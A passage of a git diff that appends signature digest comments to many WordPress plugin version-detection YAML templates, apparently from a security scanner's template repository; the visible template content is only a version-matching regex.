490a00463044022053629a1f8dbc2129095bc0c59e624420cf6f9e58fc895f6282ef1b6868d0448c02204be07a1b073c13687090a44dec6d0885d4a863cc2313d50a6706037a6e8259bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/astra-sites.yaml b/http/technologies/wordpress/plugins/astra-sites.yaml index fd7e3e99dd..b713b9dfcf 100644 --- a/http/technologies/wordpress/plugins/astra-sites.yaml +++ b/http/technologies/wordpress/plugins/astra-sites.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204090c001c08407db2736b0c1bce27aeef80dd07e6b0bc19ed3f9591889e52d1102206f71b893e4efaaf9780e9c761a836e372aa8951fbc6f019e5aef9ae9a6f159ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/autoptimize.yaml b/http/technologies/wordpress/plugins/autoptimize.yaml index 18f2a2ae84..0adacf7104 100644 --- a/http/technologies/wordpress/plugins/autoptimize.yaml +++ b/http/technologies/wordpress/plugins/autoptimize.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c2ac2c5c4018dbc04d013e7dd6d6329aed676865ef8daf43a4f4b9051ea72721022004f0f4abb9a29928fda90d6ef7c47fba4c9b83961dc300901fa03106a2677ac2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/backwpup.yaml b/http/technologies/wordpress/plugins/backwpup.yaml index 11cb41fb2c..bd73e21040 100644 --- a/http/technologies/wordpress/plugins/backwpup.yaml +++ b/http/technologies/wordpress/plugins/backwpup.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220166a059abad47d7810570e6774f74158bf750b6709c96a77756130e70d29cbb2022100bf66279eb5123f8cecc13dd1ed4087eeeb0d072eaffaa41977a70cc829785c27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-search-replace.yaml b/http/technologies/wordpress/plugins/better-search-replace.yaml index df3c5f3a94..ff9f8a3c3d 100644 --- a/http/technologies/wordpress/plugins/better-search-replace.yaml +++ b/http/technologies/wordpress/plugins/better-search-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022017ee505dcca18ebab680043b9925f57984d15f24be30f3f0ec870f6a7dceeca8022100abfbd24fce7dae963b3ed486a507e06d30ba8df3471283206e59a6eca66a25e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/better-wp-security.yaml b/http/technologies/wordpress/plugins/better-wp-security.yaml index 6a50e049dc..6d1ea5b32d 100644 --- a/http/technologies/wordpress/plugins/better-wp-security.yaml +++ b/http/technologies/wordpress/plugins/better-wp-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204016d00b414a89aa5ee3e46fd9bf70b4e6e52f59a21d6c051a3649b5ddcc3e6e022100a287c6b188915ed6124a9a1d037cfa445780b9e261d0d4dba376f3f2905f6a67:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml index e532694167..2d65493ac7 100644 --- a/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml +++ b/http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fb0d6a1c264fd9f2133b11d868175b69427130562ffeda26f311e59499c31ff602204560a3e5ec893280c5d927554304b0ef9a401f8f515662c0c8853b675f89956d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml index 4c6e616c1d..da8732fc6a 100644 --- a/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml +++ b/http/technologies/wordpress/plugins/breadcrumb-navxt.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d6a1f77e361161159079a8c9808d996b8f300de6e7f9879c44b7a5fcbaa754c70220549f66c482dc25ce5859081734f6859d254dcb5e1faf2a50059fb884d889a3b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/breeze.yaml b/http/technologies/wordpress/plugins/breeze.yaml index a70a58690c..f34dc09462 100644 --- a/http/technologies/wordpress/plugins/breeze.yaml +++ b/http/technologies/wordpress/plugins/breeze.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dc067167944e4479be804de00ef189955c02218d61594796a5528c5f14efbeeb022100cc886ea0fd38c9f26a26735b898b0e92d2664441cf3da7f97fbe0a0781348354:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/broken-link-checker.yaml b/http/technologies/wordpress/plugins/broken-link-checker.yaml index 4e3c68c53a..b53a37add5 100644 --- a/http/technologies/wordpress/plugins/broken-link-checker.yaml +++ b/http/technologies/wordpress/plugins/broken-link-checker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022012e44aec7725638cd18ee6ca09389a5b8a098851e09d76c0c61463e5ef87dae2022100c5cd95f4d634e51f124e0b09cdeb6f6d59c56a90a1375be8dcc0b966437f6102:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/chaty.yaml b/http/technologies/wordpress/plugins/chaty.yaml index 0cd866179e..cd574719af 100644 --- a/http/technologies/wordpress/plugins/chaty.yaml +++ b/http/technologies/wordpress/plugins/chaty.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502206a7409f7c925e71550c67e07908d0b5984127972a2d98e5f0a71db575e87482b022100e7b8b47bdfc6245558f4e851998901f5eee2ba79bf99f77e4bcaa77c1dd32e8b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/child-theme-configurator.yaml b/http/technologies/wordpress/plugins/child-theme-configurator.yaml index b1d8479d13..e1c9a3edc0 100644 --- a/http/technologies/wordpress/plugins/child-theme-configurator.yaml +++ b/http/technologies/wordpress/plugins/child-theme-configurator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fe4d7a22bfa930cc84cf3e766d3d24b173cf9ddddec0e2909659ab7b9edac8170220428436f17b011cd10dde2133a64ee98ab25db91ec1198ff9e081e40a1cec7891:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-editor.yaml b/http/technologies/wordpress/plugins/classic-editor.yaml index 04e090313f..977c645035 100644 --- a/http/technologies/wordpress/plugins/classic-editor.yaml +++ b/http/technologies/wordpress/plugins/classic-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f42a4cae6ddf40b5c8d65917db76e4a736afe8b4a5aaa4bd8cd70e04660e82b40220502b93dc5c68027663c8a3529cb4074ab0e7296354beda213a9ba553056eccd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/classic-widgets.yaml b/http/technologies/wordpress/plugins/classic-widgets.yaml index 57e618924b..d81de075a1 100644 --- a/http/technologies/wordpress/plugins/classic-widgets.yaml +++ b/http/technologies/wordpress/plugins/classic-widgets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210087f1678cdce7b228c96bc3fa1c81648cb1778f9d7e529fd4e3af9eabbcb80f56022100e21925e821ab239facc011f7be0a73ae79116a36a6393149d76d53b2678aaf5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml index 571b3b20a3..6c5ac3baf4 100644 --- a/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml +++ b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022011b93e838a576f4d3d9beea54328017dd16c648cbe1ddfef8a05c597517f072b022100b1cefc60d6ccbd4614b41f2823da7842e4285c1ddb7cecaadbfc03d732f87e8d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index 4d562316b4..065258c95d 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022068e59c0035d3c92eac3e53fb8bccd089e2ef8e409751d733b6aa9f493445179f022100bc52130b4aba52b9abbb507f6d3e38d206caa3ccde453b292b3086995e1f5e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index dcea952545..9293d01624 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aad2510bd151347032697d590682148f6658eb33922225cead84a0c15d1dbe6b02204a27be731170c7a3c1fbd71f672f9345022caaf8bb0a570ed88477f41ebe611c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index 0ae2f18122..df886834ba 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022004060c2f261be85351b8193a3a43fd42342b024bc89aa7e2009956b8022f4624022032df190f49c0657edb79e98c39f63ca750cae5dae460dfc35c8628f2610b3fcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 12f549d536..92d0420bb3 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204d82ad204ba61bb7164eeb5fa952765bf807868964de02e4a9ab7dc983e53bef022100ce9689aefce36b88f8e67d7c8c0aacf0863c7c68e2f4d7ecf2f2d5744b7ff2aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index d8ea6a72f1..54f28bcd0e 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dd0171e3e288ea767ed340ca8252d7f7c818ffcc658327b47557d4431cd519aa022100866ede0cb789962656f0df49e2ba1039061cdb86dfbf49cb32ce3c2dea8a81fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4afaf9dc97..aa6d437548 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dbfeffe12d3f9b7ca85f90ed53ab0349cb98788ae33a7ccd359c0cabfa889937022016725322eed4c545d8ee64c33677227d98c42a634240c4672cd6166fd4e5a464:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 88fea67f93..dd8717dcb2 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221008d2f89e74851e58ad68f44fbc00705839b30857b79a677ff8c7a9937a2c64f88022100aafb996dcdd048384f32c57de2f1a8235887ca8b33fc54ea68f9682073f200e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index d205cdbf36..f21e53228b 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fcf3db9cbeb1730a802e1802a57c54eafc4e2fba0cbd812190964a335a6fe7a00220468ef4049eae008d783b7b67dfbff39a669f58a9abc24aa2aa6db249b5109f76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index 3fa20df7d2..9fd87c0432 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fecea6afbc40fd74001395896acf1b30b19f856d8ff9c0aba27d90eed6bbc8c5022100bf215c242a5e18bea1730661e86fee7d576fa150feebab75506ab63070e13e99:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index bcd63ced86..ae507559b3 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220314a4c8ecc934abb59e2eb470b3be784ae64fe7b6403f95130c4821a58cd3504022100e692853b3c1669ed8d42c712997a1466c04d7b1e646866569b2867c08547c3ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/copy-delete-posts.yaml b/http/technologies/wordpress/plugins/copy-delete-posts.yaml index bca0326f2b..0ece59bbbf 100644 --- a/http/technologies/wordpress/plugins/copy-delete-posts.yaml +++ b/http/technologies/wordpress/plugins/copy-delete-posts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008e0dfb1128d1cda1207be0c50a778abc43ebe5e6c085581c43d50e76ca63da6c02203a3c4bbe9dc45f0bdae3f6fb18d8b0dfd70c8793fee098a06d30c6d9e9b69ced:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 854328f04b..90802a3766 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201513d0ee12dbb91822e10d3db8be7e387227f8a74514b942454d7263c0af067102202e7de7aee2ce00b92a97d62cc18371d473d88e62131d4c88d59e071a875104e0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 6d3f7f4566..a52f036977 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008aadaf04995cde392c0c04d8a98c22ddd393fbb9d2e8a23a7f8bdf9d9e37735c02203d0950232ab17b87e9513a5298435eb3075dfda62eacbd92e180a3eca7340bd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index a923d21a15..98c885ef99 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009c1dd3fa78b85d538e1b5951ff23725442e0b63d779abeae89809ddccb55355502204280df661d93c01f1617cea9616e35791a8729bf4447c53fbf3a1bd2a85117d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index f10480fc8f..cbee734269 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e133684f432712e81c8570016efc2ad1fc2654b91aaafb25aaba244e134f17b002203c15cbaf49d1f0cdcb5a24de66cd7be429b7c87d23f8cc276970dff5e06368a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 6c92091767..6f4bcf2545 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220525904ddb0b069e2164b263ab6601ca85721f5469b28b022b87f2303e9f2e0ee022100888e35d8de626bf523638a6ed01b830aac3b88c4f746b96ef89a501ba97256cf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index b25c6c9a9c..0df27ffced 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a762ee27dc941b7bb17a5d4a2ba520c5c9745a505cc658e0e1f0e8b8c98ee637022100f72e12f184fde733c4f8319e399d99e86824f318e09e8ddd33af22e63669fb76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index 1781172d05..7f805bc78a 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100eee3ee1a4c6c4a3cf2a727f2724e7d91b3dd28d8b85b53effbb5d7a490016fb4022100ef30bd5f1d04f4c61449dc06fae53ed2b27b524f1b02ec96b7ef0714fafe3593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 92c8ce3409..c593ecd9da 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022035e23b0fcb1eae118b330b06f27f922295127203d327787730576b4398b1181c02202219f15393df4092804e23ff98e3b312e80c21b947b44eb2c8fdbb7a3db08e40:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index eea42ed8da..d646b93171 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022069d185e708d79f2539b188d366ec68f069ff6e6c8d5ff11e2a04616684d3e5a80220593e20f63e0793e09867a641413ad56b11b2f5d6d741040ffb73e359cba1af16:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index bedb85a0eb..2f6a30f258 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220490a32ba460eaeffc2c2b37be79a1b25376cba2fd18816c4d2c2317efde5f59102204d2b1c8633455a478c1952a05534088091e5240afad4cb7405afea0e23d0e13f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index 45bbbc71df..b8c9fce3be 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022017371035f143b0d21f58a8521a5ac68a21c7d0e428f850db6c2945cce6224de402201f7d1ba518620b4817fb38ac790bbbd55180923a9c35de784021db5d3081b47c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index 03befac73e..9f90c59028 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402203f77bb6cc0af4f7f1f3517efcd0a60007848147e6b23275783309180c15e4fec022038dcb32a271f20c5e6150edeff22bce776454a45fa962c272a0197277c1a2969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index e1f0093127..d1c67879ae 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201cbb4ab1ecb6d7772754e15aacdc5f5ac93562c240b6df7d2ab7d0e1a64678700221008638722958a574199b188b58d737f920d0b325ac90c2bf9638f8725b422814b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 0db316d66d..46162743a8 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402202245e20826ceb1bc1861146581bcf03e0adb1db7e38204dc5ef2817ed06cf2e102207541942da845963a9f08245a025b2121354291deb1c602b6f3808ab261bcb757:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 135639253d..07947e29dd 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d37d9705c5e7a9f0b935cbdc2bafea0d5bfabd99fef4bf264fdbc3496f91f8720220319ccdc96c979eb145e36d9090e9f12a5957f9856b45c3d93a264371cbb1890a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 540fbaf9ac..5bbab2b6b1 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100c7428bfa2e3519bbe94bf1dadea21b13d5093f051577b764f0a78c6cdfdc64bc022029632e972c84ed40b61bf9a22b083a68d0de72b9ae9130d6464cbcb232cf1b91:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index 7e71b4736f..9808639ccf 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502204666dc86947420231526c0be85ed8cf94c957606d0b0ae1d41d99b1d7f8ced03022100eaa48f848689386b7bfa1ed8cb3abfbb81e48c3005581f795bcdc9dae1f80497:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index 88a70b2478..9419c7289d 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e64f356d8b4640ea1cccee85fb837660979b49118c86e3f1bf79e68a6d39479202200edfc794060a5af67e27caeac27cf56da4dae907b3e55857dee5a84440cbf3ac:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index fc498e67e6..bf1690615d 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100aedce5a99fed63f397b2ceebae837fa610706cb1abbf460cfa4cf2865ebe10ce02201f2c4fd063f65c9d968cb89e2449a5e4a6ab338b355194c8e743dc65e2eae1fc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 465aa93d57..152399799c 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5cc7645ee5779d9c9baac100226bebcb0e0e3b46eb025f82d6bc33a6b132eba022100cc4710d8af997bb46c026d6b03dd99e54fdae08a13675aec1f00a1e8a9d99fa7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2a1b0e57a9..fe6605ef79 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022045028387d51452d9dd292f0cd89d3988a90b512581b0cb41687f6b6c63e1762202204768bb891142158bfc9694e2f89df4803548dcaf851839e94e11751404568af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index df35e8b415..5562422c04 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 